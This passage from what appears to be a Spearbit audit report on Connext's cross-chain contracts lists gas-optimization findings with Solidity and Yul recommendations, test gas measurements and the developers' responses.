• Load the entire tree into memory at the beginning in MerkleTreeManager.insert(). Pass this memory tree to MerkleLib.insert().
• MerkleLib.insert() now takes the tree in memory.
• At the end of the function, it writes the updated tree back to storage.
Note that if the size of the leaves array is much smaller than TREE_DEPTH == 32, there's a chance this increases the gas consumption, since now there is an additional cost of memory expansion, and 33 slots are always written regardless of the size of the leaves array.
Connext: Solved in PR 2211.
Spearbit: Verified.

+5.4.2 EIP712 domain separator can be cached
Severity: Gas Optimization
Context: OZERC20.sol#L386
Description: The domain separator can be cached for gas optimization.
Recommendation: Consider caching the EIP712 domain separator. Following is the caching mechanism from the latest OpenZeppelin implementation, for reference.

/**
 * @dev Returns the domain separator for the current chain.
 */
function _domainSeparatorV4() internal view returns (bytes32) {
    if (address(this) == _CACHED_THIS && block.chainid == _CACHED_CHAIN_ID) {
        return _CACHED_DOMAIN_SEPARATOR;
    } else {
        return _buildDomainSeparator(_TYPE_HASH, _HASHED_NAME, _HASHED_VERSION);
    }
}

Connext: Solved in PR 2350.
Spearbit: Verified.

+5.4.3 stateCommitmentChain can be made immutable
Severity: Gas Optimization
Context: OptimismHubConnector.sol#L25
Description: Once assigned in the constructor, stateCommitmentChain cannot be changed.
Recommendation: The stateCommitmentChain variable can be defined as immutable.
Connext: Solved in PR 2480.
Spearbit: Verified.

+5.4.4 Nonce can be updated in single step
Severity: Gas Optimization
Context: SpokeConnector.sol#L278-L279
Description: The nonce can be incremented in a single step instead of using a second step, which will save some gas.
Recommendation: Change the lines below:

function dispatch(
    uint32 _destinationDomain,
    bytes32 _recipientAddress,
    bytes memory _messageBody
) external onlyWhitelistedSender returns (bytes32) {
    ...
-   uint32 _nonce = nonces[_destinationDomain];
-   nonces[_destinationDomain] = _nonce + 1;
+   uint32 _nonce = nonces[_destinationDomain]++;
    ...
}

Connext: Solved in PR 2479.
Spearbit: Verified.
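For reference, a minimal sketch of the flow recommended in 5.4.1 above, assuming the tree layout described there (32 branch slots plus a count); all names are illustrative and PR 2211's actual implementation may differ:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

uint256 constant TREE_DEPTH = 32;

struct TreeMem {
    bytes32[TREE_DEPTH] branch;
    uint256 count;
}

contract MerkleTreeManagerSketch {
    bytes32[TREE_DEPTH] internal branch;
    uint256 internal count;

    function insertMany(bytes32[] calldata leaves) external {
        // Read the whole tree from storage once.
        TreeMem memory tree;
        tree.branch = branch;
        tree.count = count;
        for (uint256 i; i < leaves.length; ) {
            _insertMem(tree, leaves[i]); // memory-only work per leaf
            unchecked {
                ++i;
            }
        }
        // Write the updated tree back to storage once. Note: all 33 slots are
        // written regardless of how many leaves were inserted (the caveat
        // mentioned in the finding).
        branch = tree.branch;
        count = tree.count;
    }

    function _insertMem(TreeMem memory tree, bytes32 node) internal pure {
        // Standard incremental merkle insertion; the tree-full check is elided.
        uint256 size = ++tree.count;
        for (uint256 i; i < TREE_DEPTH; ) {
            if ((size & 1) == 1) {
                tree.branch[i] = node;
                return;
            }
            node = keccak256(abi.encodePacked(tree.branch[i], node));
            size >>= 1;
            unchecked {
                ++i;
            }
        }
    }
}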
+5.4.5 ZkSyncSpokeConnector._sendMessage encodes unnecessary data
Severity: Gas Optimization
Context:
• ZkSyncSpokeConnector.sol#L50-L54
• ZkSyncHubConnector.sol#L88
Description: Augmenting the _data with the processMessage function selector is unnecessary, since on the mirror domain we just need to provide the right parameters to ZkSyncHubConnector.processMessageFromRoot (which, by the way, anyone can call) to prove the L2 message inclusion of the merkle root _data. Thus the current implementation is wasting gas.
Recommendation: We can rewrite the ZkSyncSpokeConnector._sendMessage function as:

function _sendMessage(bytes memory _data) internal override {
    // Dispatch message through zkSync AMB
    L1_MESSENGER_CONTRACT.sendToL1(_data);
}

Also, ZkSyncHubConnector.processMessageFromRoot would need to be changed accordingly, and the TypedMemView library import can be removed from ZkSyncHubConnector:

function processMessageFromRoot(
    // zkSync block number in which the message was sent
    uint32 _l2BlockNumber,
    // Message index, that can be received via API
    uint256 _l2MessageIndex,
    // The L2 transaction number in a block, in which the log was sent
    uint16 _l2TxNumberInBlock,
    // The message that was sent from l2
    bytes calldata _message,
    // Merkle proof for the message
    bytes32[] calldata _proof
) external {
    // sanity check root length (32 bytes root)
    require(_message.length == 32, "!length");

    IZkSync zksync = IZkSync(AMB);
    L2Message memory message = L2Message({
        txNumberInBlock: _l2TxNumberInBlock,
        sender: mirrorConnector,
        data: _message
    });

    bool success = zksync.proveL2MessageInclusion(_l2BlockNumber, _l2MessageIndex, message, _proof);
    require(success, "!proven");

    bytes32 _root = bytes32(_message);
    // NOTE: there are no guarantees the messages are processed once, so processed roots
    // must be tracked within the connector. See:
    // https://v2-docs.zksync.io/dev/developer-guides/Bridging/l2-l1.html#prove-inclusion-of-the-message-into-the-l2-block
    if (!processed[_root]) {
        // set root to processed
        processed[_root] = true;
        // update the root on the root manager
        IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, _root);
    } // otherwise root was already sent to root manager
}

Reference: Summary on L2->L1 messaging
Connext: Solved in PR 2505.
Spearbit: Verified.

+5.4.6 getD can be optimized by removing an extra multiplication by d per iteration
Severity: Gas Optimization
Context:
• SwapUtils.sol#L327-L341
• SwapUtilsExternal.sol#L364-L378
Description: The calculation for the new d can be simplified by canceling a d from the numerator and denominator. Basically, we have

$$f(D) = \frac{D^{n+1}}{n^{n+1} a \prod x_i} + \left(1 - \frac{1}{na}\right) D - \sum x_i$$

and, having/assuming $n$, $a$, $x_i$ are fixed, we are using Newton's method to find a solution for $f = 0$. The original implementation is using

$$D' = D - \frac{f(D)}{f'(D)} = \frac{\left(na \sum x_i + \frac{D^{n+1}}{n^{n-1} \prod x_i}\right) D}{(na - 1) D + (n + 1) \frac{D^{n+1}}{n^n \prod x_i}}$$

which can be simplified to

$$D' = \frac{na \sum x_i + \frac{D^n}{n^{n-1} \prod x_i} D}{(na - 1) + (n + 1) \frac{D^n}{n^n \prod x_i}}.$$

Recommendation: Lines L327-L341 can be changed to:

uint256 dP = 1;
for (uint256 j; j < numTokens; ) {
    dP = (dP * d) / (xp[j] * numTokens);
    // If we were to protect the division loss we would have to keep the denominator separate
    // and divide at the end. However this leads to overflow with large numTokens or/and D.
    // dP = dP * D * D * D * ... overflow!
    unchecked {
        ++j;
    }
}
prevD = d;
d = ((nA * s) / AmplificationUtils.A_PRECISION + dP * numTokens * d) /
    ((nA - AmplificationUtils.A_PRECISION) / AmplificationUtils.A_PRECISION + (numTokens + 1) * dP);

This simplification breaks some test cases:
Failing tests:
Encountered 9 failing tests in contracts_forge/core/connext/facets/StableSwapFacet.t.sol:StableSwapFacetTest
[FAIL. Reason: Assertion failed.] test_StableSwapFacet__addSwapLiquidity_shouldWork() (gas: 208089)
[FAIL. Reason: Call did not revert as expected] test_StableSwapFacet__removeSwapLiquidityImbalance_failIfFrontRun() (gas: 382845)
[FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityImbalance_failIfMoreThanLpBalance() (gas: 229659)
[FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityImbalance_failIfPaused() (gas: 245027)
[FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityImbalance_shouldWork() (gas: 292194)
[FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityOneToken_failIfFrontRun() (gas: 390378)
[FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityOneToken_failIfMoreThanLpBalance() (gas: 225984)
[FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityOneToken_shouldWork() (gas: 278690)
[FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidity_shouldWork() (gas: 248608)

Encountered 3 failing tests in contracts_forge/core/connext/facets/SwapAdminFacet.t.sol:SwapAdminFacetTest
[FAIL. Reason: Assertion failed.] test_SwapAdminFacet__rampA_shouldWorkWithDownwards() (gas: 269074)
[FAIL. Reason: Assertion failed.] test_SwapAdminFacet__rampA_shouldWorkWithUpwards() (gas: 269057)
[FAIL. Reason: Assertion failed.] test_SwapAdminFacet__withdrawSwapAdminFess_shouldWorkWithExpectedAmount() (gas: 241254)

Encountered a total of 12 failing tests, 521 tests succeeded

Looking at the tests, it seems like some hardcoded constants have been used, like the following: SwapAdminFacet.t.sol#L604. Where do these constants come from? Also, if this recommendation is taken into consideration, we would suggest adding fuzzing and differential tests for getD.
Connext: These constants come from Saddle Finance unit tests. Changing the code would break the tests, and new constants would have to be found to fix them. We would rather keep the current code to stay as close to the Saddle original as possible.
Spearbit: Acknowledged.

+5.4.7 _recordOutputAsSpent in ArbitrumHubConnector can be optimized by changing the require condition
Severity: Gas Optimization
Context: ArbitrumHubConnector.sol#L178
Description: In _recordOutputAsSpent, _index is compared with a literal value that is a power of 2. The exponentiation in this statement can be completely removed to save gas.
Recommendation: Rewrite the require statement as:

require((_index >> _proof.length) == 0, "!minimal proof");

Gas saved according to test cases:

test_ArbitrumHubConnector__processMessageFromRoot_failsIfNot36Bytes() (gas: -215 (-0.059%))
test_ArbitrumHubConnector__processMessageFromRoot_works() (gas: -215 (-0.099%))
test_ArbitrumHubConnector__processMessageFromRoot_failsIfIncorrectProof() (gas: -215 (-0.121%))
test_ArbitrumHubConnector__processMessageFromRoot_failsIfProofNotMinimal() (gas: -215 (-0.122%))
test_ArbitrumHubConnector__processMessageFromRoot_failsIfAlreadyProcessed() (gas: -430 (-0.186%))
Overall gas change: -1290 (-0.587%)

A similar recommendation applies if this require statement is converted to a custom error pattern.
Connext: Solved in PR 2509.
Spearbit: Verified.

+5.4.8 Message.leaf's memory manipulation is redundant
Severity: Gas Optimization
Context: Message.sol#L97-L107
Description: The chunk of memory related to _message is dissected into pieces and then copied into another section of memory and hashed.
Recommendation: We can save gas if we hash the original section instead:
function leaf(bytes29 _message) internal pure returns (bytes32 hash) {
    uint256 loc = _message.loc();
    uint256 len = _message.len();
    assembly {
        hash := keccak256(loc, len)
    }
}

Gas saved according to test cases:

test_MultichainSpokeConnector_processMessage_revertIfWrongDataLength(uint8) (gas: -163 (-0.419%))
Overall gas change: -163 (-0.419%)

Connext: Solved in PR 2484.
Spearbit: Verified.

+5.4.9 coerceBytes32 can be more optimized
Severity: Gas Optimization
Context: TypeCasts.sol#L10-L12
Description: It would be cheaper to not use TypedMemView in coerceBytes32(). We would only need to check the length and mask.
Note: coerceBytes32 doesn't seem to be used. If that is the case, it could also be removed.
Recommendation: As a rough sketch we could have:

error TheStringIsTooLongForBytes32();

uint256 internal constant INT256_MIN = 1 << 255;

function coerceBytes32(string memory _s) internal pure returns (bytes32 result) {
    bytes memory b = bytes(_s);
    uint256 length = b.length;
    if (length == 0) {
        return bytes32(0);
    }
    if (length > 32) {
        revert TheStringIsTooLongForBytes32();
    }
    assembly {
        // solhint-disable-previous-line no-inline-assembly
        let mask := sar(sub(shl(3, length), 1), INT256_MIN) // 2^(255) - 2^(255 - (8*(len) - 1))
        result := and(mload(add(b, 0x20)), mask) // clean-up possible dirty bytes
    }
}

Connext: Removed function in PR 2502.
Spearbit: Verified.

+5.4.10 Consider removing domains from propagate() arguments
Severity: Gas Optimization
Context: RootManager.sol#L147
Description: propagate(uint32[] calldata _domains, address[] calldata _connectors) only uses _domains to verify its hash against domainsHash, and to emit an event. Hence, its only use seems to be to notify off-chain agents of the supported domains.
Recommendation: Consider removing _domains from propagate()'s arguments. To still notify the off-chain agents about the supported domains, consider adding events to DomainIndexer's addDomain() and removeDomain() functions.
Connext: Fixed in commit 4c5821 and PR 2547.
Spearbit: Verified.

+5.4.11 Loop counter can be made uint256 to save gas
Severity: Gas Optimization
Context: SwapAdminFacet.sol#L132, StableSwap.sol#L90, Encoding.sol#L22-L45, TypedMemView.sol#L158
Description: There are several loops that use a uint8 as the type for the loop variable. Changing that to uint256 can save some gas.
Recommendation: Consider replacing uint8 with uint256 in loops.
Connext: Solved in PR 2372.
Spearbit: Verified.

+5.4.12 Set owner directly to zero address in renounceOwnership
Severity: Gas Optimization
Context: ProposedOwnable.sol#L135, ProposedOwnableFacet.sol#L234
Description:
1. In the renounceOwnership function (ProposedOwnable), _proposed will always be the zero address, so instead of setting the variable _proposed as owner, we can directly set address(0) as the new owner.
2. Similarly, for the renounceOwnership function (ProposedOwnableFacet), also set address(0) as the new owner.
Recommendation: Revise the renounceOwnership function:

function renounceOwnership() public virtual onlyOwner {
    ...
    // Emit event, set new owner, reset timestamp
    _setOwner(address(0));
}

Connext: Solved in PR 2482.
Spearbit: Verified.

+5.4.13 Retrieve decimals() once
Severity: Gas Optimization
Context: BridgeFacet.sol#L6, BridgeFacet.sol#L514-L516, AssetLogic.sol#L5
Description: There are several locations where the number of decimals() of tokens is retrieved. As all tokens are whitelisted, it would also be possible to retrieve the decimals() once and store these to save gas.

BridgeFacet.sol

import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
...
function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... ,! } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... } Recommendation: Consider to retrieve the decimals() of tokens once and store these. Connext: Solved in PR 2530. Spearbit: Verified. 64 +5.4.14 The root... function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space Severity: Gas Optimization Context: • Merkle.sol#L111 • Merkle.sol#L122 Description: We can use assembly, unroll loops, and use the scratch space to save gas. Also, rootWithCtx can be removed (would save us from jumping) since it has only been used here. Recommendation: library MerkleLib { ... /** * @notice Calculates and returns tree's current root. * @return _current bytes32 root. **/ function root(Tree storage tree) internal view returns (bytes32 _current) { uint256 _index = tree.count; if(_index == 0) { return Z_32; } uint256 i; assembly { let TREE_SLOT := tree.slot for {} true {} { for {} true {} { if and(_index, 1) { mstore(0, sload(TREE_SLOT)) mstore(0x20, Z_0) _current := keccak256(0, 0x40) break } if and(_index, shl(1, 1)) { mstore(0, sload(add(TREE_SLOT, 1))) mstore(0x20, Z_1) _current := keccak256(0, 0x40) i := 1 break } if and(_index, shl(2, 1)) { mstore(0, sload(add(TREE_SLOT, 2))) mstore(0x20, Z_2) _current := keccak256(0, 0x40) i := 2 break } if and(_index, shl(3, 1)) { mstore(0, sload(add(TREE_SLOT, 3))) mstore(0x20, Z_3) _current := keccak256(0, 0x40) i := 3 65 break } if and(_index, shl(4, 1)) { mstore(0, sload(add(TREE_SLOT, 4))) mstore(0x20, Z_4) _current := keccak256(0, 0x40) i := 4 break } if and(_index, shl(5, 1)) { mstore(0, sload(add(TREE_SLOT, 5))) mstore(0x20, Z_5) _current := keccak256(0, 0x40) i := 5 break } if and(_index, shl(6, 1)) { mstore(0, sload(add(TREE_SLOT, 6))) mstore(0x20, Z_6) _current := keccak256(0, 0x40) i := 6 break } if and(_index, shl(7, 1)) { mstore(0, sload(add(TREE_SLOT, 7))) mstore(0x20, Z_7) _current := keccak256(0, 0x40) i := 7 break } if and(_index, shl(8, 1)) { mstore(0, sload(add(TREE_SLOT, 8))) mstore(0x20, Z_8) _current := keccak256(0, 0x40) i := 8 break } if and(_index, shl(9, 1)) { mstore(0, sload(add(TREE_SLOT, 9))) mstore(0x20, Z_9) _current := keccak256(0, 0x40) i := 9 break } if and(_index, shl(10, 1)) { mstore(0, sload(add(TREE_SLOT, 10))) mstore(0x20, Z_10) _current := keccak256(0, 0x40) i := 10 break } if and(_index, shl(11, 1)) { mstore(0, sload(add(TREE_SLOT, 11))) mstore(0x20, Z_11) 66 _current := keccak256(0, 0x40) i := 11 break } if and(_index, shl(12, 1)) { mstore(0, sload(add(TREE_SLOT, 12))) mstore(0x20, Z_12) _current := keccak256(0, 0x40) i := 12 break } if and(_index, shl(13, 1)) { mstore(0, sload(add(TREE_SLOT, 13))) mstore(0x20, Z_13) _current := keccak256(0, 0x40) i := 13 break } if and(_index, shl(14, 1)) { mstore(0, sload(add(TREE_SLOT, 14))) mstore(0x20, Z_14) _current := keccak256(0, 0x40) i := 14 break } if and(_index, shl(15, 1)) { mstore(0, sload(add(TREE_SLOT, 15))) mstore(0x20, Z_15) _current := keccak256(0, 0x40) i := 15 break } if and(_index, shl(16, 1)) { mstore(0, sload(add(TREE_SLOT, 16))) mstore(0x20, Z_16) _current := keccak256(0, 
0x40) i := 16 break } if and(_index, shl(17, 1)) { mstore(0, sload(add(TREE_SLOT, 17))) mstore(0x20, Z_17) _current := keccak256(0, 0x40) i := 17 break } if and(_index, shl(18, 1)) { mstore(0, sload(add(TREE_SLOT, 18))) mstore(0x20, Z_18) _current := keccak256(0, 0x40) i := 18 break } if and(_index, shl(19, 1)) { 67 mstore(0, sload(add(TREE_SLOT, 19))) mstore(0x20, Z_19) _current := keccak256(0, 0x40) i := 19 break } if and(_index, shl(20, 1)) { mstore(0, sload(add(TREE_SLOT, 20))) mstore(0x20, Z_20) _current := keccak256(0, 0x40) i := 20 break } if and(_index, shl(21, 1)) { mstore(0, sload(add(TREE_SLOT, 21))) mstore(0x20, Z_21) _current := keccak256(0, 0x40) i := 21 break } if and(_index, shl(22, 1)) { mstore(0, sload(add(TREE_SLOT, 22))) mstore(0x20, Z_22) _current := keccak256(0, 0x40) i := 22 break } if and(_index, shl(23, 1)) { mstore(0, sload(add(TREE_SLOT, 23))) mstore(0x20, Z_23) _current := keccak256(0, 0x40) i := 23 break } if and(_index, shl(24, 1)) { mstore(0, sload(add(TREE_SLOT, 24))) mstore(0x20, Z_24) _current := keccak256(0, 0x40) i := 24 break } if and(_index, shl(25, 1)) { mstore(0, sload(add(TREE_SLOT, 25))) mstore(0x20, Z_25) _current := keccak256(0, 0x40) i := 25 break } if and(_index, shl(26, 1)) { mstore(0, sload(add(TREE_SLOT, 26))) mstore(0x20, Z_26) _current := keccak256(0, 0x40) i := 26 break } 68 if and(_index, shl(27, 1)) { mstore(0, sload(add(TREE_SLOT, 27))) mstore(0x20, Z_27) _current := keccak256(0, 0x40) i := 27 break } if and(_index, shl(28, 1)) { mstore(0, sload(add(TREE_SLOT, 28))) mstore(0x20, Z_28) _current := keccak256(0, 0x40) i := 28 break } if and(_index, shl(29, 1)) { mstore(0, sload(add(TREE_SLOT, 29))) mstore(0x20, Z_29) _current := keccak256(0, 0x40) i := 29 break } if and(_index, shl(30, 1)) { mstore(0, sload(add(TREE_SLOT, 30))) mstore(0x20, Z_30) _current := keccak256(0, 0x40) i := 30 break } if and(_index, shl(31, 1)) { mstore(0, sload(add(TREE_SLOT, 31))) mstore(0x20, Z_31) _current := keccak256(0, 0x40) i := 31 break } _current := Z_32 i := 32 break } if gt(i, 30) { break } { if lt(i, 1) { switch and(_index, shl(1, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_1) } default { mstore(0, sload(add(TREE_SLOT, 1))) mstore(0x20, _current) } 69 _current := keccak256(0, 0x40) } if lt(i, 2) { switch and(_index, shl(2, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_2) } default { mstore(0, sload(add(TREE_SLOT, 2))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 3) { switch and(_index, shl(3, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_3) } default { mstore(0, sload(add(TREE_SLOT, 3))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 4) { switch and(_index, shl(4, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_4) } default { mstore(0, sload(add(TREE_SLOT, 4))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 5) { switch and(_index, shl(5, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_5) } default { mstore(0, sload(add(TREE_SLOT, 5))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 6) { switch and(_index, shl(6, 1)) case 0 { 70 mstore(0, _current) mstore(0x20, Z_6) } default { mstore(0, sload(add(TREE_SLOT, 6))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 7) { switch and(_index, shl(7, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_7) } default { mstore(0, sload(add(TREE_SLOT, 7))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 8) { switch and(_index, shl(8, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_8) } default { 
mstore(0, sload(add(TREE_SLOT, 8))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 9) { switch and(_index, shl(9, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_9) } default { mstore(0, sload(add(TREE_SLOT, 9))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 10) { switch and(_index, shl(10, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_10) } default { mstore(0, sload(add(TREE_SLOT, 10))) mstore(0x20, _current) 71 } _current := keccak256(0, 0x40) } if lt(i, 11) { switch and(_index, shl(11, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_11) } default { mstore(0, sload(add(TREE_SLOT, 11))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 12) { switch and(_index, shl(12, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_12) } default { mstore(0, sload(add(TREE_SLOT, 12))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 13) { switch and(_index, shl(13, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_13) } default { mstore(0, sload(add(TREE_SLOT, 13))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 14) { switch and(_index, shl(14, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_14) } default { mstore(0, sload(add(TREE_SLOT, 14))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 15) { 72 switch and(_index, shl(15, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_15) } default { mstore(0, sload(add(TREE_SLOT, 15))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 16) { switch and(_index, shl(16, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_16) } default { mstore(0, sload(add(TREE_SLOT, 16))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 17) { switch and(_index, shl(17, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_17) } default { mstore(0, sload(add(TREE_SLOT, 17))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 18) { switch and(_index, shl(18, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_18) } default { mstore(0, sload(add(TREE_SLOT, 18))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 19) { switch and(_index, shl(19, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_19) } default { 73 mstore(0, sload(add(TREE_SLOT, 19))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 20) { switch and(_index, shl(20, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_20) } default { mstore(0, sload(add(TREE_SLOT, 20))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 21) { switch and(_index, shl(21, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_21) } default { mstore(0, sload(add(TREE_SLOT, 21))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 22) { switch and(_index, shl(22, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_22) } default { mstore(0, sload(add(TREE_SLOT, 22))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 23) { switch and(_index, shl(23, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_23) } default { mstore(0, sload(add(TREE_SLOT, 23))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } 74 if lt(i, 24) { switch and(_index, shl(24, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_24) } default { mstore(0, sload(add(TREE_SLOT, 24))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 25) { switch and(_index, shl(25, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_25) } default { mstore(0, sload(add(TREE_SLOT, 25))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 26) { switch and(_index, 
shl(26, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_26) } default { mstore(0, sload(add(TREE_SLOT, 26))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 27) { switch and(_index, shl(27, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_27) } default { mstore(0, sload(add(TREE_SLOT, 27))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 28) { switch and(_index, shl(28, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_28) 75 } default { mstore(0, sload(add(TREE_SLOT, 28))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 29) { switch and(_index, shl(29, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_29) } default { mstore(0, sload(add(TREE_SLOT, 29))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 30) { switch and(_index, shl(30, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_30) } default { mstore(0, sload(add(TREE_SLOT, 30))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 31) { switch and(_index, shl(31, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_31) } default { mstore(0, sload(add(TREE_SLOT, 31))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } } break } } } ... bytes32 internal constant Z_32 = hex"27ae5ba08d7291c96c8cbddcc148bf48a6d68c7974b94356f53754ef6171d757"; ,! } 76 Gas savings according to test cases: test_RootManager__propagate_shouldSendToAllSpokes(bytes32) (gas: -5323 (-0.201%)) test_RootManager__propagate_shouldSendToSpoke(bytes32) (gas: -6573 (-1.753%)) test_MultichainSpokeConnector_processMessage_revertIfWrongDataLength(uint8) (gas: 1470 (3.783%)) test_MainnetSpokeConnector__sendMessage_fromRootManagerWorks() (gas: -10657 (-18.110%)) test_messageFlowsWork() (gas: 650754 (21.106%)) test_Merkle__insert_shouldUpdateCount() (gas: -65402 (-25.713%)) test_GnosisSpokeConnector__sendMessage_shouldWork() (gas: -21314 (-34.402%)) test_OptimismSpokeConnector__sendMessage_works() (gas: -21314 (-34.472%)) test_MainnetSpokeConnector__sendMessage_failsIfCallerNotRootManager() (gas: -10657 (-40.132%)) test_MultichainSpokeConnector_sendMessage_sendMessageAndEmitEvent() (gas: -21314 (-40.516%)) test_PolygonSpokeConnector__sendMessage_works() (gas: -21314 (-42.397%)) test_ArbitrumSpokeConnector__sendMessage_works() (gas: -31971 (-45.808%)) Overall gas change: 436385 (-258.615%) Note the extra gas in test_messageFlowsWork() is due to the library bytecode size getting really big and the number mostly represents the deployment gas overhead. The runtime gas saving for this test is actually around -75582. We can also mix and match the techniques used here to avoid the big increase in deployment cost. For example, we can decide to not unroll loops. It is recommended to add unit and differential tests for this function, especially if you are taking this suggestion into consideration. Connext: Unrolling implemented. Deployment costs are negligible because this library should just be used in MerkleTreeManager, which should NOT be subject to redeployment (it's entire purpose in being separate contract is maintaining data permanence). Solved in PR 2211. Spearbit: Verified. +5.4.15 The insert function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space Severity: Gas Optimization Context: Merkle.sol#L76 Description: If we use assembly. the scratch space for hashing and unrolling the loop, we can save some gas. Recommendation: /** * @notice Inserts a given node (leaf) into merkle tree. * @dev Reverts if the tree is already full. 
* @param node Element to insert into tree. * @return size uint256 Updated count (number of nodes in the tree). **/ function insert(Tree storage tree, bytes32 node) internal returns (uint256 size) { size = ++tree.count; if (size > MAX_LEAVES - 1) revert MerkleLib__insert_treeIsFull(); assembly { let TREE_SLOT := tree.slot for {} true {} { switch and(size, 1) case 0 { mstore(0, sload(TREE_SLOT)) mstore(0x20, node) node := keccak256(0, 0x40) 77 } default { sstore(TREE_SLOT, node) break } switch and(size, shl(1, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 1))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 1), node) break } switch and(size, shl(2, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 2))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 2), node) break } switch and(size, shl(3, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 3))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 3), node) break } switch and(size, shl(4, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 4))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 4), node) break } switch and(size, shl(5, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 5))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 5), node) break } switch and(size, shl(6, 1)) 78 case 0 { mstore(0, sload(add(TREE_SLOT, 6))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 6), node) break } switch and(size, shl(7, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 7))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 7), node) break } switch and(size, shl(8, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 8))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 8), node) break } switch and(size, shl(9, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 9))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 9), node) break } switch and(size, shl(10, 1)) case 0 { 